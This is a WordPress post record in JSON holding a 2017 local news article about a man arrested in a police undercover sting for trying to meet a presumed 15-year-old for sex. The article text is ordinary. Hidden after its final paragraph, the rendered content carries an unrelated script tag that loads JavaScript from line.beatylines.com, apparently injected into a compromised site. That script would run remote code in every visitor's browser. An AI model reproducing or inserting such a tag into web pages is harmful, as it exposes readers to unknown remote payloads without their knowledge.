{"id":211940,"date":"2017-04-04T16:15:36","date_gmt":"2017-04-04T20:15:36","guid":{"rendered":"https:\/\/wordpress-1.tempurl.host\/?p=211940"},"modified":"2018-01-23T16:03:13","modified_gmt":"2018-01-23T21:03:13","slug":"man-arrested-after-attempting-to-meet-with-minor-for-sex","status":"publish","type":"post","link":"https:\/\/thegraphicgeek.com\/demo-cflwire\/man-arrested-after-attempting-to-meet-with-minor-for-sex\/","title":{"rendered":"Man Arrested After Attempting to Meet with Minor for Sex"},"content":{"rendered":"<p><strong>EUSTIS &#8211;\u00a0<\/strong>A Grand Island man was arrested Friday afternoon after allegedly attempting to meet with who he believed was a minor for sex.<\/p>\n<p>Instead of meeting with a minor, 55-year-old Terry Benedict was confronted by officers from the Eustis Police Department according to the report.<\/p>\n<p>Benedict&#8217;s arrest was a result of an undercover investigation that began on March 21 by Eustis Police.<\/p>\n<p>During the investigation, an undercover officer\u00a0posed as a 15-year-old girl on a social media website.<\/p>\n<p>Benedict responded to a post made by the undercover officer and continued to communicate via social media and text.<\/p>\n<p>During the communication, Benedict reportedly sent photos of himself as well as text messages containing sexual content.<\/p>\n<p>The undercover officer stated that during the communication, she told Benedict she was 15 years old and he continued\u00a0to acknowledge being okay with that.&#8221;<\/p>\n<p>Benedict agreed to meet on March 31st. When Benedict arrived at the location, he was confronted by Eustis Police officers instead.<\/p>\n<p>Benedict was arrested and charged with traveling to meet a minor to commit an unlawful sex act and attempted lewd and lascivious battery.<\/p>\n<p>He was transported to the Lake County Jail where he was later released after posting a $15,000 bond.<\/p>\n<p>During his arrest, officers found multiple &#8220;sex devices&#8221; in Benedict&#8217;s possession.<\/p>\n<p>He is scheduled to appear before a judge on April 24th at 8:30 am.<\/p>\n<p>&nbsp;<script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>EUSTIS &#8211;\u00a0A Grand Island man was arrested Friday afternoon after allegedly attempting to meet with who he believed was a minor for sex.
